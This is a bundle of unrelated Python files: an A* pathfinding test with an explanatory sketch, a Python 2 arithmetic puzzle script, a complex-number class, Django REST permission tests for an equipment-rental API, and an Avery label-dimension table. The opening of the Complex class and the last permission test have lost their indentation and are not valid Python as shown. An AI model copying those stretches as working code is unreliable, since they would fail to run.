    adjacent = [(0, -1), (0, 1), (-1, 0), (1, 0)]
    path = astar(maze, start, end, adjacent=adjacent)
    assert path == [(0, 0), (1, 0), (1, 1), (2, 1), (2, 2), (3, 2), (3, 3),
                    (3, 4), (3, 5), (4, 5), (5, 5), (6, 5), (6, 6), (7, 6)]
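The two tests differ only in the `adjacent` neighbourhood passed to `astar`: with diagonal moves allowed the path cuts through the wall gap in fewer steps, while the 4-connected variant must step around it. For reference, here is a self-contained sketch of grid A* with a Manhattan heuristic; `astar_grid` is a hypothetical stand-in, not the `aoc.astar` implementation these tests import:

```python
import heapq

def astar_grid(maze, start, end, adjacent=((0, -1), (0, 1), (-1, 0), (1, 0))):
    """Minimal A* over a 0/1 grid (1 = wall) with unit step costs."""
    def h(p):
        # Manhattan distance: admissible for the default 4-connected moves.
        return abs(p[0] - end[0]) + abs(p[1] - end[1])

    open_heap = [(h(start), start)]
    came_from = {start: None}
    g = {start: 0}
    while open_heap:
        _, cur = heapq.heappop(open_heap)
        if cur == end:
            # Walk parent links back to the start, then reverse.
            path = []
            while cur is not None:
                path.append(cur)
                cur = came_from[cur]
            return path[::-1]
        for dr, dc in adjacent:
            nxt = (cur[0] + dr, cur[1] + dc)
            if not (0 <= nxt[0] < len(maze) and 0 <= nxt[1] < len(maze[0])):
                continue  # off the grid
            if maze[nxt[0]][nxt[1]] == 1:
                continue  # wall
            tentative = g[cur] + 1
            if tentative < g.get(nxt, float("inf")):
                g[nxt] = tentative
                came_from[nxt] = cur
                heapq.heappush(open_heap, (tentative + h(nxt), nxt))
    return None  # no path

if __name__ == "__main__":
    demo = [[0] * 5 for _ in range(5)]
    print(len(astar_grid(demo, (0, 0), (4, 4))))  # 9
```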
# ger/TTP/SV1/1551.py (aLagoG/kygerand, MIT)
j = 1
while 1:
    try:
        line = raw_input()
        a, b, c = [int(i) for i in line.split()]
        if(a+b == c): print "Case "+str(j) + ": "+str(a)+"+"+str(b)+"="+str(c)
        elif(a == b+c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"+"+str(c)
        elif(a-b == c): print "Case "+str(j) + ": "+str(a)+"-"+str(b)+"="+str(c)
        elif(a == b-c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"-"+str(c)
        elif(a*b == c): print "Case "+str(j) + ": "+str(a)+"*"+str(b)+"="+str(c)
        elif(a == b*c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"*"+str(c)
        elif(a/b == c): print "Case "+str(j) + ": "+str(a)+"/"+str(b)+"="+str(c)
        elif(a == b/c): print "Case "+str(j) + ": "+str(a)+"="+str(b)+"/"+str(c)
        j += 1
    except EOFError: break
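The script above is Python 2 (`raw_input`, print statements, integer `/`). A rough Python 3 rendering of the same per-line logic, factored into a hypothetical `solve_line` helper so it can be exercised without stdin (the zero-denominator guards are an addition; the original would raise on division by zero):

```python
def solve_line(case_no, line):
    """Return the first identity a?b=c that holds, in the original order."""
    a, b, c = (int(tok) for tok in line.split())
    checks = [
        (a + b == c, "{}+{}={}"),
        (a == b + c, "{}={}+{}"),
        (a - b == c, "{}-{}={}"),
        (a == b - c, "{}={}-{}"),
        (a * b == c, "{}*{}={}"),
        (a == b * c, "{}={}*{}"),
        (b != 0 and a // b == c, "{}/{}={}"),  # Py2 int "/" is floor division
        (c != 0 and a == b // c, "{}={}/{}"),
    ]
    for holds, fmt in checks:
        if holds:
            return "Case {}: {}".format(case_no, fmt.format(a, b, c))
    return None
```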
# src/datasets/__init__.py (gchhablani/toxic-spans-detection, MIT)
from src.datasets.toxic_spans_tokens import *
from src.datasets.toxic_spans_spans import *
from src.datasets.toxic_spans_tokens_spans import *
from src.datasets.toxic_spans_multi_spans import *
from src.datasets.toxic_spans_crf_tokens import *
# -*- coding: utf-8 -*-
# cmpx/number.py (Omar-Belghaouti/PythonComplex, MIT)
"""
Created on Tue Sep 10 17:36:25 2019
@author: Omar Belghaouti
"""
from .error import print_err, print_res
from math import sqrt
# Complex class for complex number manipulations
class Complex():
# Constructor
"""
re : is the real part of complex number
im : is the imaginary part of complex number
restore : whenever an error occurs on any operation of a complex number, the last instance will be restored (By default it's true)
"""
def __init__(self, re=0, im=0, restore=True):
try:
if not ((isinstance(re, int) or isinstance(re, float)) and (isinstance(im, int) or isinstance(im, float))):
raise ValueError('Arguments re and im arguments are neither integers nor floats')
if not isinstance(restore, bool):
raise ValueError('Argument restore is not boolean')
self.re = re
self.im = im
self.restore = restore
except ValueError as err:
print_err(err)
"""
This method instanciate a Complex object from a complex number
"""
@staticmethod
def fromComplex(comp, restore=True):
try:
if isinstance(comp, complex):
return Complex(comp.real, comp.imag, restore)
else:
raise ValueError('The number you passed is not a complex')
except ValueError as err:
print_err(err)
    # Operator overloading 1 : +
    def __add__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return Complex(self.re + other.re, self.im + other.im, self.restore)
        except ValueError as err:
            print_err(err)

    # Operator overloading 2 : -
    def __sub__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return Complex(self.re - other.re, self.im - other.im, self.restore)
        except ValueError as err:
            print_err(err)

    # Operator overloading 3 : *
    def __mul__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return Complex(self.re * other.re - self.im * other.im, self.re * other.im + self.im * other.re, self.restore)
        except ValueError as err:
            print_err(err)

    # Operator overloading 4 : /
    def __truediv__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            den = other * other.con()
            num = self * other.con()
            if den.re == 0 and self.restore:
                print_res()
                return Complex(self.re, self.im, self.restore)
            return Complex(num.re / den.re, num.im / den.re, self.restore)
        except (ZeroDivisionError, ValueError) as err:
            print_err(err)
    # Operator overloading 5 : //
    def __floordiv__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            den = other * other.con()
            num = self * other.con()
            if den.re == 0 and self.restore:
                print_res()
                return Complex(self.re, self.im, self.restore)
            return Complex(num.re // den.re, num.im // den.re, self.restore)
        except (ZeroDivisionError, ValueError) as err:
            print_err(err)

    # Operator overloading 6 : >
    def __gt__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return self.mod() > other.mod()
        except ValueError as err:
            print_err(err)

    # Operator overloading 7 : >=
    def __ge__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return self.mod() >= other.mod()
        except ValueError as err:
            print_err(err)

    # Operator overloading 8: <
    def __lt__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return not self >= other
        except ValueError as err:
            print_err(err)

    # Operator overloading 9: <=
    def __le__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return not self > other
        except ValueError as err:
            print_err(err)

    # Operator overloading 10: ==
    def __eq__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return (self.re == other.re) and (self.im == other.im)
        except ValueError as err:
            print_err(err)

    # Operator overloading 11: !=
    def __ne__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            return not self == other
        except ValueError as err:
            print_err(err)
    # Operator overloading 12: +=
    def __iadd__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            self.re += other.re
            self.im += other.im
            return Complex(self.re, self.im, self.restore)
        except ValueError as err:
            print_err(err)

    # Operator overloading 13: -=
    def __isub__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            self.re -= other.re
            self.im -= other.im
            return Complex(self.re, self.im, self.restore)
        except ValueError as err:
            print_err(err)

    # Operator overloading 14: *=
    def __imul__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            # Compute both parts before assigning, so the updated real part
            # is not accidentally used when computing the imaginary part.
            re = self.re * other.re - self.im * other.im
            im = self.re * other.im + self.im * other.re
            self.re = re
            self.im = im
            return Complex(self.re, self.im, self.restore)
        except ValueError as err:
            print_err(err)

    # Operator overloading 15: /=
    # (Python 3 dispatches /= to __itruediv__; __idiv__ was the Python 2 hook)
    def __itruediv__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            den = other * other.con()
            num = self * other.con()
            if den.re == 0 and self.restore:
                print_res()
                return Complex(self.re, self.im, self.restore)
            self.re = num.re / den.re
            self.im = num.im / den.re
            return Complex(self.re, self.im, self.restore)
        except (ZeroDivisionError, ValueError) as err:
            print_err(err)

    # Operator overloading 16: //=
    def __ifloordiv__(self, other):
        try:
            if other is None:
                raise ValueError('The second number is None')
            if not isinstance(other, Complex):
                if isinstance(other, complex):
                    other = Complex(other.real, other.imag)
                else:
                    other = Complex(other)
            den = other * other.con()
            num = self * other.con()
            if den.re == 0 and self.restore:
                print_res()
                return Complex(self.re, self.im, self.restore)
            self.re = num.re // den.re
            self.im = num.im // den.re
            return Complex(self.re, self.im, self.restore)
        except (ZeroDivisionError, ValueError) as err:
            print_err(err)
    # Operator overloading 17: - (unary operator)
    def __neg__(self):
        return Complex(-self.re, -self.im, self.restore)

    ## Helper functions
    # Modulus (absolute value) of the complex number
    def mod(self):
        return sqrt(self.re**2 + self.im**2)

    # Conjugate of the complex number
    def con(self):
        return Complex(self.re, -self.im, self.restore)

    # Representation function for displaying a complex number
    def __repr__(self):
        if(self.re == 0 and self.im == 0):
            output = str(self.re)
        if(self.re != 0 and self.im > 0):
            output = str(self.re) + ' + ' + str(self.im) + 'j' if(self.im != 1) else str(self.re) + ' + ' + 'j'
        if(self.re != 0 and self.im < 0):
            output = str(self.re) + ' - ' + str(-self.im) + 'j' if(self.im != -1) else str(self.re) + ' - ' + 'j'
        if(self.re != 0 and self.im == 0):
            output = str(self.re)
        if(self.re == 0 and self.im > 0):
            output = str(self.im) + 'j' if(self.im != 1) else 'j'
        if(self.re == 0 and self.im < 0):
            output = str(self.im) + 'j' if(self.im != -1) else '-j'
        return output
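The division overloads above all rely on the standard conjugate trick: z1/z2 = (z1 * conj(z2)) / (z2 * conj(z2)), where the denominator is purely real, so the problem reduces to dividing two real numbers into each part. A self-contained check of that identity using Python's built-in `complex` type (illustrative only, independent of the `Complex` class above):

```python
def divide_via_conjugate(z1: complex, z2: complex) -> complex:
    # Multiplying numerator and denominator by conj(z2) makes the
    # denominator real: z2 * conj(z2) == |z2|**2.
    den = (z2 * z2.conjugate()).real
    num = z1 * z2.conjugate()
    return complex(num.real / den, num.imag / den)

print(divide_via_conjugate(complex(3, 4), complex(1, -2)))  # (-1+2j)
```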
# project/scripts/clausecat/custom_code.py (svlandeg/healthsea, MIT)
import scripts.clausecat.clausecat_component
import scripts.clausecat.clause_segmentation
import scripts.clausecat.clausecat_reader
import scripts.clausecat.clausecat_model
import scripts.clausecat.clause_aggregation
import benepar
# backend/pedidos/tests/test_view_permissions.py (JoaoAPS/AlugaInstrumentos, MIT)
from rest_framework import status
from mixer.backend.django import mixer

from pedidos.models import Pedido
from equipamentos.models import Equipamento


def test_pedido_list_view_permissions(
    unauthenticatedClient, userClient, adminClient, list_url
):
    """Test the permissions on the pedidos API list view"""
    res = unauthenticatedClient.get(list_url)
    assert res.status_code == status.HTTP_403_FORBIDDEN

    res = userClient.get(list_url)
    assert res.status_code == status.HTTP_200_OK

    res = adminClient.get(list_url)
    assert res.status_code == status.HTTP_200_OK
def test_pedido_retrieve_view_permissions(
    unauthenticatedClient, userClient, adminClient, detail_url, user, admin
):
    """Test the permissions on the pedidos API retrieve view"""
    res = unauthenticatedClient.get(detail_url(0))
    assert res.status_code == status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=user)
    res = userClient.get(detail_url(pedido.id))
    assert res.status_code == status.HTTP_200_OK

    pedido = mixer.blend(Pedido, user=admin)
    res = adminClient.get(detail_url(pedido.id))
    assert res.status_code == status.HTTP_200_OK

    # Pedidos belonging to other users
    res = userClient.get(detail_url(pedido.id))
    assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_create_view_permissions(
    unauthenticatedClient, userClient, adminClient, list_url
):
    """Test the permissions on the pedidos API create view"""
    equipamento = mixer.blend(Equipamento)
    payload = {'equipamentos': [equipamento.id]}

    res = unauthenticatedClient.post(list_url, payload)
    assert res.status_code == status.HTTP_403_FORBIDDEN

    res = userClient.post(list_url, payload)
    assert res.status_code != status.HTTP_403_FORBIDDEN

    res = adminClient.post(list_url, payload)
    assert res.status_code != status.HTTP_403_FORBIDDEN
def test_pedido_update_view_permissions(
    unauthenticatedClient, userClient, adminClient, detail_url, user, admin
):
    """Test the permissions on the pedidos API update view"""
    payload = {'equipamentos': []}

    res = unauthenticatedClient.patch(detail_url(0), payload)
    assert res.status_code == status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=user)
    res = userClient.patch(detail_url(pedido.id), payload)
    assert res.status_code == status.HTTP_200_OK

    pedido = mixer.blend(Pedido, user=admin)
    res = adminClient.patch(detail_url(pedido.id), payload)
    assert res.status_code == status.HTTP_200_OK

    # Pedidos belonging to other users
    res = userClient.patch(detail_url(pedido.id), payload)
    assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_delete_view_permissions(
    unauthenticatedClient, userClient, adminClient, detail_url, user, admin
):
    """Test the permissions on the pedidos API delete view"""
    res = unauthenticatedClient.delete(detail_url(0))
    assert res.status_code == status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=user)
    res = userClient.delete(detail_url(pedido.id))
    assert res.status_code == status.HTTP_204_NO_CONTENT

    pedido = mixer.blend(Pedido, user=admin)
    res = adminClient.delete(detail_url(pedido.id))
    assert res.status_code == status.HTTP_204_NO_CONTENT

    # Pedidos belonging to other users
    res = userClient.delete(detail_url(pedido.id))
    assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_add_item_view_permissions(
    unauthenticatedClient, userClient, adminClient, add_item_url, user, admin
):
    """Test the permissions on the pedidos API add_item view"""
    equipamento = mixer.blend(Equipamento)
    payload = {'equipamento': equipamento.id}

    res = unauthenticatedClient.post(add_item_url(0), payload)
    assert res.status_code == status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=user)
    res = userClient.post(add_item_url(pedido.id), payload)
    assert res.status_code == status.HTTP_200_OK

    pedido = mixer.blend(Pedido, user=admin)
    res = adminClient.post(add_item_url(pedido.id), payload)
    assert res.status_code == status.HTTP_200_OK

    # Pedidos belonging to other users
    res = userClient.post(add_item_url(pedido.id), payload)
    assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_remove_item_view_permissions(
    unauthenticatedClient,
    userClient,
    adminClient,
    remove_item_url,
    user,
    admin
):
    """Test the permissions on the pedidos API remove_item view"""
    equipamento = mixer.blend(Equipamento)

    res = unauthenticatedClient.delete(remove_item_url(0, 0))
    assert res.status_code == status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=user)
    pedido.equipamentos.add(equipamento)
    res = userClient.delete(remove_item_url(pedido.id, equipamento.id))
    assert res.status_code == status.HTTP_204_NO_CONTENT

    pedido = mixer.blend(Pedido, user=admin)
    pedido.equipamentos.add(equipamento)
    res = adminClient.delete(remove_item_url(pedido.id, equipamento.id))
    assert res.status_code == status.HTTP_204_NO_CONTENT

    # Pedidos belonging to other users
    res = userClient.delete(remove_item_url(pedido.id, equipamento.id))
    assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_confirmation_view_permissions(
    unauthenticatedClient,
    userClient,
    adminClient,
    confirmation_url,
    user,
    admin
):
    """Test the permissions on the pedidos API confirmation view"""
    res = unauthenticatedClient.post(confirmation_url(0))
    assert res.status_code == status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=user)
    res = userClient.post(confirmation_url(pedido.id))
    assert res.status_code != status.HTTP_403_FORBIDDEN

    pedido = mixer.blend(Pedido, user=admin)
    res = adminClient.post(confirmation_url(pedido.id))
    assert res.status_code != status.HTTP_403_FORBIDDEN

    # Pedidos belonging to other users
    res = userClient.post(confirmation_url(pedido.id))
    assert res.status_code == status.HTTP_404_NOT_FOUND
def test_pedido_cancelation_view_permissions(
unauthenticatedClient,
userClient,
adminClient,
cancelation_url,
user,
admin
):
"""Testa as permissões na cancelation view da api dos pedidos"""
res = unauthenticatedClient.post(cancelation_url(0))
assert res.status_code == status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=user)
res = userClient.post(cancelation_url(pedido.id))
assert res.status_code != status.HTTP_403_FORBIDDEN
pedido = mixer.blend(Pedido, user=admin)
res = adminClient.post(cancelation_url(pedido.id))
assert res.status_code != status.HTTP_403_FORBIDDEN
# Pedidos de outros usuários
res = userClient.post(cancelation_url(pedido.id))
assert res.status_code == status.HTTP_404_NOT_FOUND
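The 403/404/204 pattern exercised above (anonymous caller rejected, another user's pedido hidden rather than forbidden, owner allowed) can be sketched without Django as a plain ownership check. The names `delete_item` and `pedido_owner_by_id` here are illustrative only and are not part of the test suite:

```python
from http import HTTPStatus


def delete_item(requesting_user, pedido_owner_by_id, pedido_id):
    """Mimic the permission matrix the tests above assert.

    - 403 for anonymous callers,
    - 404 when the pedido exists but belongs to someone else
      (an owner-scoped queryset simply does not contain it),
    - 204 when the requester owns the pedido.
    """
    if requesting_user is None:
        return HTTPStatus.FORBIDDEN
    owner = pedido_owner_by_id.get(pedido_id)
    if owner != requesting_user:
        # Hidden, not forbidden: leaking existence would reveal other
        # users' pedidos, so the view answers as if it does not exist.
        return HTTPStatus.NOT_FOUND
    return HTTPStatus.NO_CONTENT


pedidos = {1: "user", 2: "admin"}
assert delete_item(None, pedidos, 1) == HTTPStatus.FORBIDDEN
assert delete_item("user", pedidos, 1) == HTTPStatus.NO_CONTENT
assert delete_item("user", pedidos, 2) == HTTPStatus.NOT_FOUND
```

Answering 404 instead of 403 for other users' objects is the same design choice DRF makes when `get_queryset` is filtered by the requesting user.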
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pyprototypr/utils/labels_avery.py (gamesbook/pyprototypr, BSD-2-Clause)
labels_avery = [
{'3363': {'id': 'LP18/63', 'shape': 'rectangle', 'number': 18, 'width': 45.7, 'height': 46.6}},
{'3421': {'id': 'LP33/70S', 'shape': 'rectangle', 'number': 33, 'width': 70, 'height': 25.4}},
{'3422^': {'id': 'LP24/70S', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 35}},
{'3423^': {'id': 'LP16/105S', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 35}},
{'3425^': {'id': 'LP10/105S', 'shape': 'rectangle', 'number': 10, 'width': 105, 'height': 57}},
{'3426^': {'id': 'LP8/105S', 'shape': 'rectangle', 'number': 8, 'width': 105, 'height': 70}},
{'3448': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3449': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3450': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3451': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3452': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3453': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3454': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3455': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3456': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3457': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3458': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3459': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3470': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3470': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3470': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3471': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3471': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3471': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3472': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3472': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3472': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3473': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3473': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3473': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3474': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'3475': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'3478': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3478': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3478': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'3483': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'3484': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'3489': {'id': 'LP30/70', 'shape': 'rectangle', 'number': 30, 'width': 70, 'height': 30}},
{'3490': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'3652': {'id': 'LP21/70', 'shape': 'rectangle', 'number': 21, 'width': 70, 'height': 42.4}},
{'3653': {'id': 'LP14/105', 'shape': 'rectangle', 'number': 14, 'width': 105, 'height': 42.5}},
{'3655': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'3668': {'id': 'LP56/52', 'shape': 'rectangle', 'number': 56, 'width': 52.5, 'height': 21.3}},
{'3669^': {'id': 'LP15/70S', 'shape': 'rectangle', 'number': 15, 'width': 70, 'height': 50}},
{'6070': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6071': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6072': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6073': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'6093': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'6094': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6094': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6094': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6102': {'id': 'LP48/45', 'shape': 'rectangle', 'number': 48, 'width': 45.7, 'height': 21.2}},
{'6104': {'id': 'LP27/63', 'shape': 'rectangle', 'number': 27, 'width': 45.7, 'height': 29.6}},
{'6110': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6110': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6110': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6119': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6119': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6119': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6120': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'6122': {'id': 'LP24/70SS', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 36}},
{'6124': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'6125': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6125': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6125': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'6174': {'id': 'LP21/70', 'shape': 'rectangle', 'number': 21, 'width': 70, 'height': 42.4}},
{'6176': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'AB1900': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'AB7000': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'C2160': {'id': 'LP21/63', 'shape': 'rectangle', 'number': 21, 'width': 45.7, 'height': 38.1}},
{'C2244^': {'id': 'LP6/72R', 'shape': 'circle', 'number': 6, 'width': 72, 'height': 72}},
{'C2246': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'C2246': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'C2246': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'C2651': {'id': 'LP65/38', 'shape': 'rectangle', 'number': 65, 'width': 38.1, 'height': 21.2}},
{'C4167': {'id': 'LP1/199', 'shape': 'rectangle', 'number': 1, 'width': 199.6, 'height': 289.1}},
{'C6074': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'C9169': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'C9660': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'C9780': {'id': 'LPCD117', 'shape': 'circle', 'number': 2, 'width': 117, 'height': 117}},
{'CL7059': {'id': 'LP24/63', 'shape': 'rectangle', 'number': 24, 'width': 45.7, 'height': 33.9}},
{'CL7069': {'id': 'LP4/99', 'shape': 'rectangle', 'number': 4, 'width': 99.1, 'height': 139}},
{'DL01': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DL01': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DL01': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DL04': {'id': 'LP4/105', 'shape': 'rectangle', 'number': 4, 'width': 105, 'height': 149}},
{'DL08': {'id': 'LP8/105', 'shape': 'rectangle', 'number': 8, 'width': 105, 'height': 74.2}},
{'DL16': {'id': 'LP16/105', 'shape': 'rectangle', 'number': 16, 'width': 105, 'height': 37}},
{'DL24^': {'id': 'LP24/70S', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 35}},
{'DL24NZ': {'id': 'LP24/70', 'shape': 'rectangle', 'number': 24, 'width': 70, 'height': 37}},
{'DPS01': {'id': 'LP1/210J', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DPS02': {'id': 'LP1/210V', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
{'DPS02': {'id': 'LP2/210', 'shape': 'rectangle', 'number': 2, 'width': 210, 'height': 149}},
{'DPS03': {'id': 'LP1/210H', 'shape': 'rectangle', 'number': 1, 'width': 210, 'height': 298}},
